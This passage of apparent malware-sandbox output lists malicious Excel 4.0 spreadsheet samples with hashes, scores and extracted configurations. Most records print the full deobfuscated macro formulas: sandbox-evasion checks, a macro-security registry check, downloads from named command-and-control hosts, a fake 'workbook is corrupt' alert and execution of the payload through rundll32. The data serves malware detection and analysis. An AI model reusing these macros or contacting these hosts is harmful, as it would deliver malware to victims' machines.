CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"mXzHiu9Pzo\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25f1d49bf0f7de51d733c3e8fd8eca80316bc28ba4741d219a56828fa978f967"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25f1d49bf0f7de51d733c3e8fd8eca80316bc28ba4741d219a56828fa978f967","filesize":160768,"md5":"79ab06d61f4db41954bae52ccf648c1c","sha1":"1c61e231d1d9e22ae8e558a1a5af69653df3d36d","sha256":"25f1d49bf0f7de51d733c3e8fd8eca80316bc28ba4741d219a56828fa978f967","sha512":"06cb385cd72a585a4c6260a12eb8fec6f0f1f41eb24a094b7a0fa8b3b7daf3e4fe0e1c40a52ace9276812e4535468987e7888aa3f2965e0c3483731510fe8490","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25f1d49bf0f7de51d733c3e8fd8eca80316bc28ba4741d219a56828fa978f967.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dN3e3fp2Kp\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"25f63735898aefd98b8f9f9cd5e7f725b5a0e6626a65ad3aa2875e56b8af6c09"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"25f63735898aefd98b8f9f9cd5e7f725b5a0e6626a65ad3aa2875e56b8af6c09","filesize":185344,"md5":"0df115487058934dbda1fc97f5e9613e","sha1":"9a93955e31cbe6671487579a3faf463fefe4c1e8","sha256":"25f63735898aefd98b8f9f9cd5e7f725b5a0e6626a65ad3aa2875e56b8af6c09","sha512":"0a8369b73ae7a589cf58d949656bdca72fff1f31c89fb191d8d8e823c977a4e53f3f1cdc837c0ff45cc1b745db2e8381c32fc9928021473a278173d5152c02dc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"25f63735898aefd98b8f9f9cd5e7f725b5a0e6626a65ad3aa2875e56b8af6c09.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"260a1586c3aeca77e50aa4d34e4b79a8d96e0df8079a6cabab94340b2db55c99"},"analysis":{"reported":"2020-04-09T16:15:23Z","score":10},"files":[{"filename":"260a1586c3aeca77e50aa4d34e4b79a8d96e0df8079a6cabab94340b2db55c99","filesize":207360,"md5":"682a67410b2847e1fa89da7d5b342463","sha1":"ed83bcb4c7191c51478b688e9bec5c133946cf5a","sha256":"260a1586c3aeca77e50aa4d34e4b79a8d96e0df8079a6cabab94340b2db55c99","sha512":"e3cacf949c5dbc3bb2dccf4e04870627751a16ff2994d0f192c1769b3ad02d45b72cc3897136cd8098aef40d50d7240c777f91cf6dbebe357ddc60cdca3a7d97","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"260a1586c3aeca77e50aa4d34e4b79a8d96e0df8079a6cabab94340b2db55c99.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-cran.php","https://narensyndicate.com/wp-cran.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-cran.php\",\"c:\\Users\\Public\\cskc75ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cskc75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eS2A4K5xgX\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2611476da130bffee83b875fee676589084873ae04b88c513d703b4600913078"},"analysis":{"reported":"2020-04-09T16:15:24Z","score":10},"files":[{"filename":"2611476da130bffee83b875fee676589084873ae04b88c513d703b4600913078","filesize":144896,"md5":"b39e23bedd176b634966f8e57486d39d","sha1":"a8323c616474c23295cb3fd53eb731d091069a78","sha256":"2611476da130bffee83b875fee676589084873ae04b88c513d703b4600913078","sha512":"78c35ef6d2341588d372c8b479eb2909606d72c40d97061f4fb1d7da98543a78e4b882ddb8812b59747f7a730716964bcef6dd4dd485c42009eba0ea3d89b307","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2611476da130bffee83b875fee676589084873ae04b88c513d703b4600913078.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/1451345341fff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"261e47393ede5ebf2936a1b235e5ab4a94e9d891a75a7aa1fdd10765857aa4a1"},"analysis":{"reported":"2020-04-09T16:15:24Z","score":10},"files":[{"filename":"261e47393ede5ebf2936a1b235e5ab4a94e9d891a75a7aa1fdd10765857aa4a1","filesize":167424,"md5":"afd0e797f31190a9683878c4e6d2d5d3","sha1":"3ded66c7de3d8a78eea095b06f5d6f5e8e127dcd","sha256":"261e47393ede5ebf2936a1b235e5ab4a94e9d891a75a7aa1fdd10765857aa4a1","sha512":"102831476b704d9cac198eeeb7cd88fae3c24b26631e49b9776ce9a1340a79beb7a73f30b7bdb390ec04d5da8a9afe51b0f21e5807000f332b85b91d9792cf3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"261e47393ede5ebf2936a1b235e5ab4a94e9d891a75a7aa1fdd10765857aa4a1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"hMP13j6Atk\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"261ff5575c2bf076f033b5b6dd4bd1476d7237bb434425a21402354797c273d2"},"analysis":{"reported":"2020-04-09T16:15:24Z","score":10},"files":[{"filename":"261ff5575c2bf076f033b5b6dd4bd1476d7237bb434425a21402354797c273d2","filesize":209920,"md5":"4ebf81ef2b7c9a5b32807241b04cc790","sha1":"c599cc6245dcfd24c5de125c4d5777aee5d15f59","sha256":"261ff5575c2bf076f033b5b6dd4bd1476d7237bb434425a21402354797c273d2","sha512":"d1ab6b3e5403e649d7d188098729bbc1788b9af5f35fb9f041bbe034f3dbf1e0768a98fe174a6f049e22cca8785dc896c5233251944a64f50b5d9923b815b9ed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"261ff5575c2bf076f033b5b6dd4bd1476d7237bb434425a21402354797c273d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jOmtmDJ0ex\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"263372aaf2367932e6272cbf2f40e85a43b44f799c32e13d05eacfe904d15812"},"analysis":{"reported":"2020-04-09T16:15:24Z","score":10},"files":[{"filename":"263372aaf2367932e6272cbf2f40e85a43b44f799c32e13d05eacfe904d15812","filesize":167936,"md5":"dd7626236df667c5b977ca3280f378d2","sha1":"b238c52cf613c0ce19c76d0a0238e273c85256e9","sha256":"263372aaf2367932e6272cbf2f40e85a43b44f799c32e13d05eacfe904d15812","sha512":"75ebc2f136411374f76c33ee2936aba2df0fd84b7046bcb42a132c8057d8733444e723a7db48566ba9d7a3caec1bf2575b00b06f0c60e3f6a3f24138e547afd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"263372aaf2367932e6272cbf2f40e85a43b44f799c32e13d05eacfe904d15812.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"i0GFtiyNnL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2672f0d5fea87c66056968b75cb7cbe1ab1385a3271742d4922bf3f2bf014a7c"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"2672f0d5fea87c66056968b75cb7cbe1ab1385a3271742d4922bf3f2bf014a7c","filesize":226304,"md5":"6e8f0e65d29817764919e5b633c2ec53","sha1":"9b2e6a7a451c7f404d25131decb0b23245a24320","sha256":"2672f0d5fea87c66056968b75cb7cbe1ab1385a3271742d4922bf3f2bf014a7c","sha512":"cd84f3306b3ef3845f9c890dd315d42c9a911820582f355dbf57c85117145d9be6d4e01c5b776d00d82df0401c1cc9dd99c5924cec2d06ec2c46c44db5bdd1b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2672f0d5fea87c66056968b75cb7cbe1ab1385a3271742d4922bf3f2bf014a7c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pOmAsNXIr5\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"267a6da880b87fbb3c74e8ef84f469d6795f450c"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"267a6da880b87fbb3c74e8ef84f469d6795f450c","filesize":214016,"md5":"05f0733ab9c8d500e5c8b728b73a359f","sha1":"267a6da880b87fbb3c74e8ef84f469d6795f450c","sha256":"0ef9ba966074be3b356f51b89df07a7b7345b694dfdf9f68b0009615d5ce28fd","sha512":"458d6b15953ffda2e3e589962ffc748d12dd6a1c37e6261af3c2bc954793655d5e231e3390ab43984be7daafa0e6fb1e0d57471ca027ccb704c98037dd1a6829","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"267a6da880b87fbb3c74e8ef84f469d6795f450c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"tBtNRCydwb\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"267dfdc70c637cdc3624e73f825428cb831d9191470d8886475f57f3de44c6b8"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"267dfdc70c637cdc3624e73f825428cb831d9191470d8886475f57f3de44c6b8","filesize":185344,"md5":"f6d700edb5902646ee5ba4526f0f6c01","sha1":"b6a644821e2dd3634b5c77c441a4f4c4b991c571","sha256":"267dfdc70c637cdc3624e73f825428cb831d9191470d8886475f57f3de44c6b8","sha512":"938bb388efedee5f2049a773c5e89503ec52b4cbf78a6daf064ee168b58c7985fe1650726930cb6997f16d9da01388648014f65f31f60bba88135821a6b17fcd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"267dfdc70c637cdc3624e73f825428cb831d9191470d8886475f57f3de44c6b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"267e1cae1d392484b1c327b672e5920d381762b5a8486a54065be5695efd52c1"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"267e1cae1d392484b1c327b672e5920d381762b5a8486a54065be5695efd52c1","filesize":185344,"md5":"d902af10773900e7c233d298e9ad64d9","sha1":"ebabe5497a1e7d444c1643329440623df814b48a","sha256":"267e1cae1d392484b1c327b672e5920d381762b5a8486a54065be5695efd52c1","sha512":"5ebc7d40c25da7ceb279f7d00810a60186649f45a1cdbb0c1ba0f04c5634adb91c5d006cbb4bef323676c1110d14889817f36283bb499636d467728311dd58c5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"267e1cae1d392484b1c327b672e5920d381762b5a8486a54065be5695efd52c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2682c97d1e25797e9ac82b9dc93a6ab3ed709298800298f4a32dca47a7a70b89"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"2682c97d1e25797e9ac82b9dc93a6ab3ed709298800298f4a32dca47a7a70b89","filesize":167936,"md5":"ba30db4b7448beec24a7014ef87490ac","sha1":"0ae1e3081b50af16534475e9b9a29e9bb8323bae","sha256":"2682c97d1e25797e9ac82b9dc93a6ab3ed709298800298f4a32dca47a7a70b89","sha512":"34cbd03ab772561f9b916675a8b48747476f17de8e13be4d4565b5e1bc421cd460299d708c5e70d75e814e41df176b27bf404b2bedfcf45bfef8ba92c1bf962f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2682c97d1e25797e9ac82b9dc93a6ab3ed709298800298f4a32dca47a7a70b89.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4AXWg2s9S6\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2686844ba7803d96b961f6bc8d60a3b50e90e44f0910d9114ba9c08322cfc581"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"2686844ba7803d96b961f6bc8d60a3b50e90e44f0910d9114ba9c08322cfc581","filesize":104448,"md5":"6bb21737905683379c15b92277c71c69","sha1":"2758e97fa0334083c18784db2a64d132c7a21f99","sha256":"2686844ba7803d96b961f6bc8d60a3b50e90e44f0910d9114ba9c08322cfc581","sha512":"c72f39e6c9f1d8c34d047818dcfd5cc83780c3182a4fc7e30ed22421bdeac7b8a3afd71ff748c488ef044c0805d8b68d58bd8d7b1040ad0a6f2a32b6638e2c86","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2686844ba7803d96b961f6bc8d60a3b50e90e44f0910d9114ba9c08322cfc581.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ykTDL7nrqM\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"26901d558e6dee2020d5c54fcc73343715d1714a8c26d888d8f838c2bd6d902c"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"26901d558e6dee2020d5c54fcc73343715d1714a8c26d888d8f838c2bd6d902c","filesize":113664,"md5":"6f8a97ebfa558b5ab08b89e9ada22691","sha1":"2bbce890b2ff4e8645b84d7b964ac04858f632f2","sha256":"26901d558e6dee2020d5c54fcc73343715d1714a8c26d888d8f838c2bd6d902c","sha512":"57fd4eed19220cd14dd224f2b29871a2f4e4620e7ed531d42e960ade0aa554e7c27300ae2d70c6cddec084cc3ced3e3a8d9f2e3ce7c47f76d29a73e0b7e7ebe6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"26901d558e6dee2020d5c54fcc73343715d1714a8c26d888d8f838c2bd6d902c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lQGVRCe7gg\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"269e11eaf9da35a2f357f4d6ca3892c11d3e76415946f45f56fb28962d72fee6"},"analysis":{"reported":"2020-04-09T16:15:25Z","score":10},"files":[{"filename":"269e11eaf9da35a2f357f4d6ca3892c11d3e76415946f45f56fb28962d72fee6","filesize":168987,"md5":"f934888804cb0d17cb451d68eec402cc","sha1":"29e8fbf38f55ad16ba31b3b98720c552f688edd2","sha256":"269e11eaf9da35a2f357f4d6ca3892c11d3e76415946f45f56fb28962d72fee6","sha512":"fbb0644da12a6a556330fb22b787115bd97c788d48b8cbbe13d169f2df4d6ae6856ebab1680d7235aaf7bef7ec195ce45949ddd152b8fff294c188deff11ea6a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"269e11eaf9da35a2f357f4d6ca3892c11d3e76415946f45f56fb28962d72fee6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"YQy4ixcC6P\",TRUE)\nGOTO(R$0C$19)"}}}]}
